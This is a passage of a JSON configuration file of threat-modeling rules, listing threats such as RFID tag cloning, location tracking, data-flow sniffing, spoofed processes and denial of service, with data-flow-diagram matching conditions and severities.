example, packet 1 may be 100 bytes starting at offset 0. Packet 2 may be 100 bytes starting at offset 25. Packet 2 will overwrite 75 bytes of packet 1. Ensure you reassemble data before filtering it, and ensure you explicitly handle these sorts of cases.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"fec7c871-d868-4edf-9bca-80c9061e830b","Name":"JSON processing","Description":"If a dataflow contains JSON, JSON processing and hijacking threats may be exploited.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"82c0d2ca-5756-40bd-a2e9-3c7ab8c5c2ba","Name":"Tag cloning","Description":"A cloned tag may enable access to sensitive data or restricted areas","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[]},"Severity":2},{"ID":"bd2cf4bb-a728-46bd-8d38-269b4cfef7be","Name":"Tag tracking","Description":"Tracking a tag by its unique identifier allows, for example, to create a movement profile","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["61d04f2d-83b1-4152-9aba-4ad188eef06d","2765e61e-29a9-498e-adf8-4d653f488e3d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[]},"Severity":2},{"ID":"d07d24f4-10b5-452d-a489-10c9752dda4d","Name":"Tag inventorying","Description":"Tags with an EPC are vulnerable to inventory attacks. For example, medical devices such as pacemakers can be used to draw conclusions about the health of individuals.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","e6ba8518-0074-492c-95e5-ebe89fa601fe"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"355ded09-e3ae-41f7-8bbb-3fa0870e35a6","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"6394d7a4-c2db-4fe6-826c-93b1cd0d5373","Name":"Location tracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","2765e61e-29a9-498e-adf8-4d653f488e3d","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"840b5bd1-b250-427c-bf56-5ddf826382ff","DetailRestrictions":[]},"Severity":3},{"ID":"66f7a456-2edb-4d91-9bd1-aec421a92011","Name":"Sending data to spoofed data store","Description":"Process has outbound data flow to data store. E.g., database is spoofed, process writes to wrong place. (see Threat modeling - designing for security: Table 3-10-1)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"ddc5a2f1-7466-488d-a4f4-9f6a1520a00e","Name":"Sending confidential data to data store","Description":"Process has outbound data flow to data store. E.g. process writes information to data store which should not be there. (see Threat modeling - designing for security: Table 3-10-1)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"4d724289-8fe3-47c5-b44b-7fd9cac6c701","Name":"Sending data to spoofed process","Description":"Process sends output to another process. E.g., Process2 is spoofed, Process1 writes to wrong place. (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"97682dbc-2fb9-456d-94c3-a6a09998b5a4","Name":"Process denies receiving data","Description":"Process sends output to another process. E.g., Process2 claims not to have received data from Process1.  (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"9e788439-62ed-44ea-9b19-093f92cf2223","Name":"Sending confidential data to process","Description":"Process sends output to another process. E.g., Process2 is not authorized to receive data. (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"30b01ab6-2eea-49ff-ac4e-f5838f8a8337","Name":"Sending data to spoofed log. external entity","Description":"Process sends output to log. external entity. E.g., external entity is spoofed. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"4f56c6cd-3daa-4b7a-91a5-740403957ff5","Name":"External entity denies receiving data","Description":"Process sends output to log. external entity. E.g., browser disclaims and doesn\'t acknowledge the output. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"7b140721-9f7a-46a7-8290-931efec07769","Name":"Sending confidential data to log. external entity","Description":"Process sends output to log. external entity. E.g., ext. entity gets data it\'s not authorized to get. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"557991c1-4eeb-40e1-96c3-c8a214278e29","Name":"Phy. external entity denies receiving data","Description":"Process sends output to phy. external entity. E.g., human disclaims seeing the output. (see Threat modeling - designing for security: Table 3-10-4)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"8fabcdad-c70f-4416-8cb6-5c65a21142b0","Name":"Receiving data from spoofed data store","Description":"Process has inbound data flow from data store. E.g., database is spoofed and process reads the wrong data. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"f5894534-60a9-4363-84e5-4c0479ca71b9","Name":"Processing corrupted data","Description":"Process has inbound data flow from data store. E.g., process is corrupted by data read from the data store. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"71f98504-8182-4fb2-81ed-aea1e1953215","Name":"Process denies services due to received data","Description":"Process has inbound data flow from data store. E.g., process state is corrupted by the data retrieved from the data store. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"6d1d58a3-f4ff-4938-93d8-d91bb9ae3f58","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from data store. E.g., process internal state is corrupted based on data read from the data store, leading to code execution.  (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8687e614-c127-418b-8fda-536bb2f0708f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"6ca91e1b-746c-47bb-8cd3-2fa0c478042e","Name":"Receiving data from spoofed process","Description":"Process has inbound data flow from another process. E.g., Process1 believes it\'s getting data from Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"a1b5637c-fac3-4b49-bf3f-5f39ce8757da","Name":"Process denies receiving data","Description":"Process has inbound data flow from another process. E.g., Process1 denies getting data from Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"c0158e50-7c0f-4457-a8ea-223ff165fdaf","Name":"Process denies services","Description":"Process has inbound data flow from another process. E.g., Process1 crashes due to interaction with Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"984d970a-8ef5-445c-a15b-7613b313306c","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from another process. E.g., Process2 passes data or args that allow it to change flow of execution of Process1. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"a7f340d4-3aa2-45d2-9226-db55414c7f69","Name":"Receiving data from spoofed external entity","Description":"Process has inbound data flow from external entity. E.g., Process believes it\'s getting data from the ext. entity, when it fact it\'s a random attacker. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"2a2ea224-58c9-4187-b721-940fc97b1c04","Name":"Process denies services","Description":"Process has inbound data flow from external entity. E.g., process crashes due to ext. entity interaction. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"c1e53b74-7e9d-4566-b690-978bfc8b9af3","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from external entity. E.g., ext. entity passes data or args that allow it to change flow of execution of process. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8687e614-c127-418b-8fda-536bb2f0708f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"35915020-1d0c-4853-849d-d32159bf6401","Name":"Tampering with data flow","Description":"Data flow crosses trust boundary. E.g., data flow is modified by MITM attack. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}}]}},{"ID":"1308104d-16da-432f-a70f-8de14a8bfbf9","Name":"Data flow sniffing","Description":"Data flow crosses trust boundary. E.g., the contents of the data flow are sniffed on the wire. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":false}}]}},{"ID":"3008afca-320c-489b-9ff6-f61b7cdf497c","Name":"Denial of service","Description":"Data flow crosses trust boundary. E.g., the data flow is interrupted by an ext. entity, e.g. messing with TCP sequence numbers. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"46a79465-8cb7-4c8e-8025-e1a08e9620d8","Name":"Corrupting the data store","Description":"Process has outbound data flow to data store. E.g., data store is corrupted. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"134a6570-e75e-4c8a-bd2f-f02b5a052878","Name":"Data store reveals information","Description":"Process has outbound data flow to data store. E.g., data store reveals information. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"4c4d3f55-3ffd-4416-9bc3-4bf2921110e1","Name":"Process denies writing data","Description":"Process has outbound data flow to data store. E.g., process claims not to have written to data store. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"0115bdb1-d2ab-4bbc-bfd1-b23c831b5a70","Name":"Data store cannot be written to","Description":"Process has outbound data flow to data store. E.g., data store cannot be written to. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"b06930a0-bff1-49e4-889c-6211290de683","Name":"Process denies reading data","Description":"Process has inbound data flow from data store. E.g., process claims not to have read from data store. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"2a171a21-0d62-4159-b7ab-5e2ad1796fff","Name":"Data store reveals information","Description":"Process has inbound data flow from data store. E.g., data store discloses information. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"7e4e6144-6504-4796-a3ca-00962c0a9cbb","Name":"Data store cannot be read from","Description":"Process has inbound data flow from data store. E.g., data store cannot be read from. (see Threat modeling - designing for security: Table 